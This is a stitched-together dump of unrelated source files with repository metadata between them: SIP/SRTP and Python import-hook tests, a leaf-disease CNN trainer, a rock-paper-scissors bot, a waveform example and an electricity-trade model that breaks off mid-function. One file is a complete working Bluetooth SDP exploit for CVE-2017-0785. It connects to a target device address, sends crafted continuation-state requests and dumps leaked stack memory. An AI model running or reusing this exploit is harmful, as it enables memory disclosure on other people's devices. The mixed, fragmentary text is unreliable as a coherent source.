"BSD-3-Clause"
] | 4
|
2016-09-29T00:04:31.000Z
|
2021-12-02T08:39:51.000Z
|
pjproject_android/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
WachterJud/qaul.net_legacy
|
9c2be0a38ad6e90fadc0d1150340e37d220997ae
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2020-02-20T06:58:16.000Z
|
2020-02-20T07:08:07.000Z
|
my_softphone/pjproject-2.9/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
sashkaseltsov1/reposCpp
|
3ff5ce2a14a368a36b1758099ce4f3e8c4cdf11d
|
[
"Unlicense"
] | 5
|
2019-07-02T02:03:24.000Z
|
2022-03-30T09:58:52.000Z
|
# $Id: 312_srtp1_recv_savp.py 2036 2008-06-20 17:43:55Z nanang $
import inc_sip as sip
import inc_sdp as sdp
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=tester
c=IN IP4 127.0.0.1
t=0 0
m=audio 4000 RTP/SAVP 0 101
a=rtpmap:0 PCMU/8000
a=sendrecv
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:WnD7c1ksDGs+dIefCEo8omPg4uO8DYIinNGL5yxQ
a=crypto:2 AES_CM_128_HMAC_SHA1_32 inline:t0r0/apkukU7JjjfR0mY8GEimBq4OiPEm9eKSFOx
"""
args = "--null-audio --auto-answer 200 --max-calls 1 --use-srtp 1 --srtp-secure 0"
include = ["m=audio \d+ RTP/SAVP", "a=crypto"]
exclude = []
sendto_cfg = sip.SendtoCfg( "Callee has SRTP optional receive RTP/SAVP, should answer RTP/SAVP too",
pjsua_args=args, sdp=sdp, resp_code=200,
resp_inc=include, resp_exc=exclude)
| 27.758621
| 101
| 0.735404
|
4a0f29e7b4d4b0d87220729cdf6e8cbb7e41aa32
| 8,589
|
py
|
Python
|
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
import sys
import imp
import os
import unittest
from test import test_support
test_src = """\
def get_name():
return __name__
def get_file():
return __file__
"""
absimp = "import sub\n"
relimp = "from . import sub\n"
deeprelimp = "from .... import sub\n"
futimp = "from __future__ import absolute_import\n"
reload_src = test_src+"""\
reloaded = True
"""
test_co = compile(test_src, "<???>", "exec")
reload_co = compile(reload_src, "<???>", "exec")
test2_oldabs_co = compile(absimp + test_src, "<???>", "exec")
test2_newabs_co = compile(futimp + absimp + test_src, "<???>", "exec")
test2_newrel_co = compile(relimp + test_src, "<???>", "exec")
test2_deeprel_co = compile(deeprelimp + test_src, "<???>", "exec")
test2_futrel_co = compile(futimp + relimp + test_src, "<???>", "exec")
test_path = "!!!_test_!!!"
class TestImporter:
modules = {
"hooktestmodule": (False, test_co),
"hooktestpackage": (True, test_co),
"hooktestpackage.sub": (True, test_co),
"hooktestpackage.sub.subber": (True, test_co),
"hooktestpackage.oldabs": (False, test2_oldabs_co),
"hooktestpackage.newabs": (False, test2_newabs_co),
"hooktestpackage.newrel": (False, test2_newrel_co),
"hooktestpackage.sub.subber.subest": (True, test2_deeprel_co),
"hooktestpackage.futrel": (False, test2_futrel_co),
"sub": (False, test_co),
"reloadmodule": (False, test_co),
}
def __init__(self, path=test_path):
if path != test_path:
# if out class is on sys.path_hooks, we must raise
# ImportError for any path item that we can't handle.
raise ImportError
self.path = path
def _get__path__(self):
raise NotImplementedError
def find_module(self, fullname, path=None):
if fullname in self.modules:
return self
else:
return None
def load_module(self, fullname):
ispkg, code = self.modules[fullname]
mod = sys.modules.setdefault(fullname,imp.new_module(fullname))
mod.__file__ = "<%s>" % self.__class__.__name__
mod.__loader__ = self
if ispkg:
mod.__path__ = self._get__path__()
exec code in mod.__dict__
return mod
class MetaImporter(TestImporter):
def _get__path__(self):
return []
class PathImporter(TestImporter):
def _get__path__(self):
return [self.path]
class ImportBlocker:
"""Place an ImportBlocker instance on sys.meta_path and you
can be sure the modules you specified can't be imported, even
if it's a builtin."""
def __init__(self, *namestoblock):
self.namestoblock = dict.fromkeys(namestoblock)
def find_module(self, fullname, path=None):
if fullname in self.namestoblock:
return self
return None
def load_module(self, fullname):
raise ImportError, "I dare you"
class ImpWrapper:
def __init__(self, path=None):
if path is not None and not os.path.isdir(path):
raise ImportError
self.path = path
def find_module(self, fullname, path=None):
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [self.path]
try:
file, filename, stuff = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(file, filename, stuff)
class ImpLoader:
def __init__(self, file, filename, stuff):
self.file = file
self.filename = filename
self.stuff = stuff
def load_module(self, fullname):
mod = imp.load_module(fullname, self.file, self.filename, self.stuff)
if self.file:
self.file.close()
mod.__loader__ = self # for introspection
return mod
class ImportHooksBaseTestCase(unittest.TestCase):
def setUp(self):
self.path = sys.path[:]
self.meta_path = sys.meta_path[:]
self.path_hooks = sys.path_hooks[:]
sys.path_importer_cache.clear()
self.modules_before = sys.modules.copy()
def tearDown(self):
sys.path[:] = self.path
sys.meta_path[:] = self.meta_path
sys.path_hooks[:] = self.path_hooks
sys.path_importer_cache.clear()
sys.modules.clear()
sys.modules.update(self.modules_before)
class ImportHooksTestCase(ImportHooksBaseTestCase):
def doTestImports(self, importer=None):
import hooktestmodule
import hooktestpackage
import hooktestpackage.sub
import hooktestpackage.sub.subber
self.assertEqual(hooktestmodule.get_name(),
"hooktestmodule")
self.assertEqual(hooktestpackage.get_name(),
"hooktestpackage")
self.assertEqual(hooktestpackage.sub.get_name(),
"hooktestpackage.sub")
self.assertEqual(hooktestpackage.sub.subber.get_name(),
"hooktestpackage.sub.subber")
if importer:
self.assertEqual(hooktestmodule.__loader__, importer)
self.assertEqual(hooktestpackage.__loader__, importer)
self.assertEqual(hooktestpackage.sub.__loader__, importer)
self.assertEqual(hooktestpackage.sub.subber.__loader__, importer)
TestImporter.modules['reloadmodule'] = (False, test_co)
import reloadmodule
self.failIf(hasattr(reloadmodule,'reloaded'))
TestImporter.modules['reloadmodule'] = (False, reload_co)
reload(reloadmodule)
self.failUnless(hasattr(reloadmodule,'reloaded'))
import hooktestpackage.oldabs
self.assertEqual(hooktestpackage.oldabs.get_name(),
"hooktestpackage.oldabs")
self.assertEqual(hooktestpackage.oldabs.sub,
hooktestpackage.sub)
import hooktestpackage.newrel
self.assertEqual(hooktestpackage.newrel.get_name(),
"hooktestpackage.newrel")
self.assertEqual(hooktestpackage.newrel.sub,
hooktestpackage.sub)
import hooktestpackage.sub.subber.subest as subest
self.assertEqual(subest.get_name(),
"hooktestpackage.sub.subber.subest")
self.assertEqual(subest.sub,
hooktestpackage.sub)
import hooktestpackage.futrel
self.assertEqual(hooktestpackage.futrel.get_name(),
"hooktestpackage.futrel")
self.assertEqual(hooktestpackage.futrel.sub,
hooktestpackage.sub)
import sub
self.assertEqual(sub.get_name(), "sub")
import hooktestpackage.newabs
self.assertEqual(hooktestpackage.newabs.get_name(),
"hooktestpackage.newabs")
self.assertEqual(hooktestpackage.newabs.sub, sub)
def testMetaPath(self):
i = MetaImporter()
sys.meta_path.append(i)
self.doTestImports(i)
def testPathHook(self):
sys.path_hooks.append(PathImporter)
sys.path.append(test_path)
self.doTestImports()
def testBlocker(self):
mname = "exceptions" # an arbitrary harmless builtin module
if mname in sys.modules:
del sys.modules[mname]
sys.meta_path.append(ImportBlocker(mname))
try:
__import__(mname)
except ImportError:
pass
else:
self.fail("'%s' was not supposed to be importable" % mname)
def testImpWrapper(self):
i = ImpWrapper()
sys.meta_path.append(i)
sys.path_hooks.append(ImpWrapper)
mnames = ("colorsys", "urlparse", "distutils.core", "compiler.misc")
for mname in mnames:
parent = mname.split(".")[0]
for n in sys.modules.keys():
if n.startswith(parent):
del sys.modules[n]
for mname in mnames:
m = __import__(mname, globals(), locals(), ["__dummy__"])
m.__loader__ # to make sure we actually handled the import
def test_main():
test_support.run_unittest(ImportHooksTestCase)
if __name__ == "__main__":
test_main()
| 33.034615
| 78
| 0.600768
|
4a0f2a23eb163e4a363a24e969c5cd41f35ae2b0
| 3,488
|
py
|
Python
|
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
config = ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dense
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
import matplotlib.pyplot as plt
import numpy as np
import os
#basic cnn
# Initialising the CNN
classifier = Sequential()
# Step 1 - Convolution
classifier.add(Conv2D(32, (3, 3), input_shape = (128, 128, 3), activation = 'relu'))
# Step 2 - Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Adding a second convolutional layer
classifier.add(Conv2D(32, (3, 3), activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Step 3 - Flattening
classifier.add(Flatten())
# Step 4 - Full connection
classifier.add(Dense(units = 128, activation = 'relu'))
classifier.add(Dense(units = 10, activation = 'sigmoid'))
# Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\train", # relative path from working directoy
target_size = (128, 128),
batch_size = 6, class_mode = 'categorical')
valid_set = test_datagen.flow_from_directory("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\val", # relative path from working directoy
target_size = (128, 128),
batch_size = 3, class_mode = 'categorical')
labels = (training_set.class_indices)
print(labels)
classifier.fit_generator(training_set,
steps_per_epoch = 20,
epochs = 50,
validation_data=valid_set
)
classifier_json=classifier.to_json()
with open("model1.json", "w") as json_file:
json_file.write(classifier_json)
# serialize weights to HDF5
classifier.save_weights("my_model_weights.h5")
classifier.save("model.h5")
print("Saved model to disk")
'''
import cv2
from matplotlib import pyplot as plt
import os
import numpy as np
img = cv2.imread("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\test\\Tomato___Leaf_Mold (1).JPG")
img_resize = cv2.resize(img, (128,128))
CV2 reads an image in BGR format. We need to convert it to RGB
b,g,r = cv2.split(img_resize) # get b,g,r
rgb_img = cv2.merge([r,g,b]) # switch it to rgb
plt.imshow(rgb_img)
label_map = (training_set.class_indices)
print(label_map)
img_rank4 = np.expand_dims(rgb_img/255, axis=0)
classifier.predict(img_rank4)
h = list(label_map.keys())[classifier.predict_classes(img_rank4)[0]]
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(img, h, (10, 30), font, 1.0, (0, 0, 255), 1)
cv2.imshow(h,img)
print(h)
'''
| 33.538462
| 189
| 0.696674
|
4a0f2a2ac835550fa12181e5b660f5a249319269
| 1,859
|
py
|
Python
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 5
|
2021-03-21T15:18:39.000Z
|
2021-04-30T16:48:10.000Z
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 3
|
2021-03-21T17:42:07.000Z
|
2021-03-31T07:12:18.000Z
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 3
|
2021-03-21T16:12:25.000Z
|
2021-03-31T06:13:42.000Z
|
import getopt
import sys
from typing import Dict
import yaml
moves_lang2en: Dict = dict()
moves_en2lang: Dict = dict()
# default value
variables_filename = 'variables.yml'
lang = 'en'
variables_file = open(variables_filename, 'r')
variable_dict: Dict = yaml.safe_load(variables_file)
variables_file.close()
supported_languages = variable_dict.keys()
argv = sys.argv[1:]
usage_message = (f"Usage: python {__file__} [OPTIONS]\n"
"\n"
"Options:\n"
"-l, --language Select the language of the game.\n"
" The default is english.\n")
try:
opts, args = getopt.getopt(argv, "hl:",
["help", "language ="])
except Exception:
print('Invalid option\n')
print(usage_message)
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print(usage_message)
sys.exit()
elif opt in ("-l", "--language"):
if arg not in supported_languages:
print(f"Invalid arguments for language: {arg}")
print(f'Supported languages: {", ".join(supported_languages)}')
sys.exit(3)
lang = arg
variables: Dict = variable_dict[lang]
for en, lang in variables['moves'].items():
moves_en2lang[en] = lang
moves_lang2en[lang] = en
player_move = ''
while player_move not in moves_lang2en:
input_message = variables['messages']['input'] \
.format(moves=", ".join(moves_lang2en.keys()))
player_move = input(input_message).lower().strip()
player_move = moves_lang2en[player_move]
bot_move = 'rock'
if (player_move == 'paper'):
bot_move = 'scissor'
elif (player_move == 'rock'):
bot_move = 'paper'
bot_move = moves_en2lang[bot_move]
print()
print(variables['messages']['bot_pick'].format(bot_move=bot_move))
print(variables['messages']['defeat'])
| 27.338235
| 75
| 0.628295
|
4a0f2aa074555df2c9c89b630235e449be0fddfc
| 1,226
|
py
|
Python
|
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
import phenom
import matplotlib
# matplotlib.use('MacOSX')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from phenom.utils.utils import Constants, HztoMf
import phenom
m1 = 35.
m2 = 30.
chi1x = 0.9
chi1y = 0.
chi1z = 0.
chi2x = 0.
chi2y = 0.
chi2z = 0.
delta_f = 1./8.
f_min = 30.
fRef = f_min
inclination = np.pi/3.
phenompv3 = phenom.Waveform(approximant="IMRPhenomPv3")
from copy import copy
phenpv3_1 = copy(phenompv3)
phenpv3_1.input_params['m1']=m1
phenpv3_1.input_params['m2']=m2
phenpv3_1.input_params['chi1x']=chi1x
phenpv3_1.input_params['chi1y']=chi1y
phenpv3_1.input_params['chi1z']=chi1z
phenpv3_1.input_params['chi2x']=chi2x
phenpv3_1.input_params['chi2y']=chi2y
phenpv3_1.input_params['chi2z']=chi2z
phenpv3_1.input_params['inclination']=inclination
phenpv3_1.input_params['f_min']=f_min
phenpv3_1.input_params['fRef']=fRef
phenpv3_1.input_params['delta_f']=delta_f
print("starting phenompv3 generator")
#phenomp_v3 waveform generator
phenpv3_1.phenompv3(phenpv3_1.input_params)
plt.figure()
plt.plot(phenpv3_1.flist_Hz, np.absolute(phenpv3_1.hptilde), label='phenom.v3')
plt.xscale('log')
plt.yscale('log')
plt.legend(loc='best')
plt.savefig('./FD_amplitude_phenpv3.png')
| 21.892857
| 79
| 0.771615
|
4a0f2ab81b084e9a134f01f2f4557ab624188c8b
| 389
|
py
|
Python
|
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | 1
|
2022-03-13T20:15:41.000Z
|
2022-03-13T20:15:41.000Z
|
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | null | null | null |
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | 1
|
2022-03-04T16:07:51.000Z
|
2022-03-04T16:07:51.000Z
|
from pgportfolio.nnagent.tradertrainer import TraderTrainer
class RollingTrainer(TraderTrainer):
def __init__(self, config, **kwargs):
config = config.copy()
config["training"]["buffer_biased"] = config["trading"]["buffer_biased"]
config["training"]["learning_rate"] = config["trading"]["learning_rate"]
TraderTrainer.__init__(self, config, **kwargs)
| 38.9
| 80
| 0.699229
|
4a0f2b992475d900716dc5633e891c46b7566a82
| 1,262
|
py
|
Python
|
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | null | null | null |
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | 1
|
2020-02-05T13:00:29.000Z
|
2020-02-05T13:00:29.000Z
|
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------
# Mimas: conference submission and review system
# (c) Allan Kelly 2016-2020 http://www.allankelly.net
# Licensed under MIT License, see LICENSE file
# -----------------------------------------------------
# System imports
# Google imports
# Local imports
import basehandler
from submission_lib import submissionrecord, voterecord
from subreview_lib import reviewer
class SubmissionAssignmentsPage(basehandler.BaseHandler):
def get(self):
conference = self.get_crrt_conference_key().get()
review_round = int(self.request.get("round", "1"))
submissions = submissionrecord.retrieve_conference_submissions(conference.key)
submission_keys = map(lambda s: s.key, submissions)
template_values = {
"submissions": submissions,
"assignment_count": dict(reviewer.count_submission_reviewers(submission_keys, review_round)),
"tracks": conference.track_options(),
"vote_count": voterecord.count_votes_for_submissions(submission_keys, review_round),
"crrt_conf": conference,
"review_round": review_round,
}
self.write_page('subreview_lib/subsassignmentpage.html', template_values)
| 36.057143
| 105
| 0.656101
|
4a0f2c088ad2cfeca82aedd9e45cf77f1967209a
| 1,129
|
py
|
Python
|
remote/44555.py
|
malos17713/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | 446
|
2018-08-21T09:33:28.000Z
|
2022-03-30T02:53:47.000Z
|
remote/44555.py
|
AngelsDemon/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | null | null | null |
remote/44555.py
|
AngelsDemon/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | 105
|
2018-08-21T09:33:40.000Z
|
2022-02-09T14:01:37.000Z
|
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
exit()
target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30
def packet(service, continuation_state):
    """Build an SDP service-search-attribute request as a raw byte string.

    `service` is the 16-bit service UUID; `continuation_state` is the
    opaque continuation blob echoed back from the previous response.
    """
    fields = [
        '\x02\x00\x00',                    # PDU header (ID + transaction id)
        p16(7 + len(continuation_state)),  # parameter length
        '\x35\x03\x19',                    # data-element sequence header
        p16(service),                      # service UUID
        '\x01\x00',                        # max attribute byte count
        continuation_state,                # continuation state blob
    ]
    return ''.join(fields)
p = log.progress('Exploit')
p.status('Creating L2CAP socket')
# Raw L2CAP socket to the SDP PSM; cap the MTU so responses stay small.
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, mtu)
# SDP fields are big-endian on the wire, so make pwntools' p16() pack
# big-endian from here on (packet() relies on this).
context.endian = 'big'
p.status('Connecting to target')
sock.connect((target, 1))
p.status('Sending packet 0')
# First request with an empty (single zero byte) continuation state.
sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)
# Third-from-last byte is the continuation-state length; expect 0x02.
if data[-3] != '\x02':
    log.error('Invalid continuation state received.')
stack = ''
for i in range(1, n):
    p.status('Sending packet %d' % i)
    # Replay the last 3 bytes (continuation state) from the previous
    # response; each reply leaks more remote memory.
    sock.send(packet(service_short, data[-3:]))
    data = sock.recv(mtu)
    # Strip the 9-byte response header and the trailing continuation state;
    # the middle is the leaked memory.
    stack += data[9:-3]
sock.close()
p.success('Done')
# Python 2 print statement: hex dump of everything leaked.
print hexdump(stack)
| 21.711538
| 65
| 0.635075
|
4a0f2c0a6b7c6f3af60e7b6bb1cbca539e4bb38f
| 31,740
|
py
|
Python
|
electricitylci/eia_io_trading.py
|
bl-young/ElectricityLCI
|
091be051a60c15f762b150dd0e2b7cfd6adbed1a
|
[
"CC0-1.0"
] | 17
|
2018-10-26T14:58:10.000Z
|
2022-02-01T00:17:27.000Z
|
electricitylci/eia_io_trading.py
|
hottleta/ElectricityLCI
|
45f292ed8ebcdf7acfe17ee609862fa072b75ea0
|
[
"CC0-1.0"
] | 129
|
2018-07-16T22:02:32.000Z
|
2022-03-16T19:11:35.000Z
|
electricitylci/eia_io_trading.py
|
hottleta/ElectricityLCI
|
45f292ed8ebcdf7acfe17ee609862fa072b75ea0
|
[
"CC0-1.0"
] | 8
|
2018-08-29T11:27:52.000Z
|
2021-03-05T06:36:22.000Z
|
import numpy as np
import os
import pandas as pd
# import eia
from datetime import datetime
import pytz
import json
from os.path import join
import zipfile
import requests
import logging
from electricitylci.globals import data_dir, output_dir
from electricitylci.bulk_eia_data import download_EBA, row_to_df, ba_exchange_to_df
from electricitylci.model_config import model_specs
import electricitylci.eia923_generation as eia923
import electricitylci.eia860_facilities as eia860
from electricitylci.process_dictionary_writer import *
"""
Merge generation and emissions data. Add region designations using either
eGRID or EIA-860. Same for primary fuel by plant (eGRID or 923). Calculate
and merge in the total generation by region. Create the column "Subregion"
to hold regional name info. Remove electricity flows. Rename flows and add
UUIDs according to the federal flow list.
Parameters
----------
year : int
Specified year to pull transaction data between balancing authorities
subregion : str
Description of a group of regions. Options include 'FERC' for all FERC
market regions, 'BA' for all balancing authorities.
Returns
-------
Dictionary of dataframes with import region, export region, transaction amount, total
imports for import region, and fraction of total. The dictionary keys
are the level of aggregation: "BA", "FERC", "US".
Sample output:
ferc_final_trade.head()
import ferc region export ferc region value total fraction
0 CAISO CAISO 2.662827e+08 3.225829e+08 0.825471
1 CAISO Canada 1.119572e+06 3.225829e+08 0.003471
2 CAISO ERCOT 0.000000e+00 3.225829e+08 0.000000
3 CAISO ISO-NE 0.000000e+00 3.225829e+08 0.000000
4 CAISO MISO 0.000000e+00 3.225829e+08 0.000000
"""
def ba_io_trading_model(year=None, subregion=None, regions_to_keep=None):
    """Build electricity trade fractions between balancing authorities.

    Uses EIA bulk (form 930) data plus Canadian import files to apply the
    input-output trading method of Qu et al. (2018) and estimate each
    region's consumption mix.

    Parameters
    ----------
    year : int, optional
        Trading year; defaults to ``model_specs.NETL_IO_trading_year``.
    subregion : str, optional
        'BA', 'FERC', or 'US'; defaults to
        ``model_specs.regional_aggregation``. Other values raise ValueError.
    regions_to_keep : list of str, optional
        If given, restrict output to these balancing authority names.

    Returns
    -------
    dict of pandas.DataFrame
        Keys 'BA', 'FERC', 'US'; each maps import region to export region
        with the traded fraction of the import region's consumption.
    """
    REGION_NAMES = [
        'California', 'Carolinas', 'Central',
        'Electric Reliability Council of Texas, Inc.', 'Florida',
        'Mid-Atlantic', 'Midwest', 'New England ISO',
        'New York Independent System Operator', 'Northwest', 'Southeast',
        'Southwest', 'Tennessee Valley Authority'
    ]
    REGION_ACRONYMS = [
        'TVA', 'MIDA', 'CAL', 'CAR', 'CENT', 'ERCO', 'FLA',
        'MIDW', 'ISNE', 'NYIS', 'NW', 'SE', 'SW',
    ]
    if year is None:
        year = model_specs.NETL_IO_trading_year
    if subregion is None:
        subregion = model_specs.regional_aggregation
    if subregion not in ['BA', 'FERC', 'US']:
        raise ValueError(
            f'subregion or regional_aggregation must have a value of "BA" or "FERC" '
            f'when calculating trading with input-output, not {subregion}'
        )
    # Read in BAA file which contains the names and abbreviations
    df_BA = pd.read_excel(data_dir + '/BA_Codes_930.xlsx', sheet_name = 'US', header = 4)
    df_BA.rename(columns={'etag ID': 'BA_Acronym', 'Entity Name': 'BA_Name','NCR_ID#': 'NRC_ID', 'Region': 'Region'}, inplace=True)
    # (dropped unused `BA = pd.np.array(...)`; pd.np was removed in pandas 2.0)
    US_BA_acronyms = df_BA['BA_Acronym'].tolist()
    # Read in BAA file which contains the names and abbreviations
    # Original df_BAA does not include the Canadian balancing authorities
    # Import them here, then concatenate to make a single df_BAA_NA (North America)
    df_BA_CA = pd.read_excel(data_dir + '/BA_Codes_930.xlsx', sheet_name = 'Canada', header = 4)
    df_BA_CA.rename(columns={'etag ID': 'BA_Acronym', 'Entity Name': 'BA_Name','NCR_ID#': 'NRC_ID', 'Region': 'Region'}, inplace=True)
    df_BA_NA = pd.concat([df_BA, df_BA_CA])
    ferc_list = df_BA_NA['FERC_Region_Abbr'].unique().tolist()
    # Read in the bulk data
    # download_EBA()
    path = join(data_dir, 'bulk_data', 'EBA.zip')
    NET_GEN_ROWS = []
    BA_TO_BA_ROWS = []
    DEMAND_ROWS = []
    TOTAL_INTERCHANGE_ROWS = []
    try:
        logging.info("Using existing bulk data download")
        z = zipfile.ZipFile(path, 'r')
    except FileNotFoundError:
        logging.info("Downloading new bulk data")
        download_EBA()
        z = zipfile.ZipFile(path, 'r')
    logging.info("Loading bulk data to json")
    with z.open('EBA.txt') as f:
        for line in f:
            # All but one BA is currently reporting net generation in UTC and local time
            # for that one BA (GRMA) only UTC time is reported - so only pulling that
            # for now.
            if b'EBA.NG.H' in line and b'EBA.NG.HL' not in line:
                NET_GEN_ROWS.append(json.loads(line))
            # Similarly there are 5 interchanges that report interchange in UTC but not in
            # local time.
            elif b'EBA.ID.H' in line and b'EBA.ID.HL' not in line:
                exchange_line = json.loads(line)
                if exchange_line['series_id'].split('-')[0][4:] not in REGION_ACRONYMS:
                    BA_TO_BA_ROWS.append(exchange_line)
            # Keeping these here just in case
            elif b'EBA.D.H' in line and b'EBA.D.HL' not in line:
                DEMAND_ROWS.append(json.loads(line))
    logging.info(f"Net gen rows: {len(NET_GEN_ROWS)}; BA to BA rows:{len(BA_TO_BA_ROWS)}; Demand rows:{len(DEMAND_ROWS)}")
    eia923_gen = eia923.build_generation_data(generation_years=[year])
    eia860_df = eia860.eia860_balancing_authority(year)
    eia860_df["Plant Id"] = eia860_df["Plant Id"].astype(int)
    eia_combined_df = eia923_gen.merge(eia860_df,
                                       left_on=["FacilityID"],
                                       right_on=["Plant Id"],
                                       how="left")
    eia_gen_ba = eia_combined_df.groupby(by=["Balancing Authority Code"], as_index=False)["Electricity"].sum()
    # Subset for specified eia_gen_year
    start_datetime = '{}-01-01 00:00:00+00:00'.format(year)
    end_datetime = '{}-12-31 23:00:00+00:00'.format(year)
    start_datetime = datetime.strptime(start_datetime, '%Y-%m-%d %H:%M:%S%z')
    end_datetime = datetime.strptime(end_datetime, '%Y-%m-%d %H:%M:%S%z')
    # Net Generation Data Import
    logging.info("Generating df with datetime")
    df_net_gen = row_to_df(NET_GEN_ROWS, 'net_gen')
    del(NET_GEN_ROWS)
    logging.info("Pivoting")
    df_net_gen = df_net_gen.pivot(index = 'datetime', columns = 'region', values = 'net_gen')
    ba_cols = US_BA_acronyms
    gen_cols = list(df_net_gen.columns.values)
    gen_cols_set = set(gen_cols)
    ba_ref_set = set(ba_cols)
    col_diff = list(ba_ref_set - gen_cols_set)
    col_diff.sort(key = str.upper)
    logging.info("Cleaning net_gen dataframe")
    # Add in missing columns, then sort in alphabetical order
    for i in col_diff:
        df_net_gen[i] = 0
    # Keep only the columns that match the balancing authority names, there are several other columns included in the dataset
    # that represent states (e.g., TEX, NY, FL) and other areas (US48)
    df_net_gen = df_net_gen[ba_cols]
    # Resort columns so the headers are in alpha order
    df_net_gen = df_net_gen.sort_index(axis=1)
    df_net_gen = df_net_gen.fillna(value = 0)
    df_net_gen = df_net_gen.loc[start_datetime:end_datetime]
    # Sum values in each column
    df_net_gen_sum = df_net_gen.sum(axis = 0).to_frame()
    logging.info("Reading canadian import data")
    # Add Canadian import data to the net generation dataset, concatenate and put in alpha order
    df_CA_Imports_Gen = pd.read_csv(data_dir + '/CA_Imports_Gen.csv', index_col = 0)
    df_CA_Imports_Gen = df_CA_Imports_Gen[str(year)]
    logging.info("Combining US and Canadian net gen data")
    df_net_gen_sum = pd.concat([df_net_gen_sum, df_CA_Imports_Gen]).sum(axis=1)
    df_net_gen_sum = df_net_gen_sum.to_frame()
    df_net_gen_sum = df_net_gen_sum.sort_index(axis=0)
    # Check the net generation of each Balancing Authority against EIA 923 data.
    # If the percent change of a given area is greater than the mean absolute difference
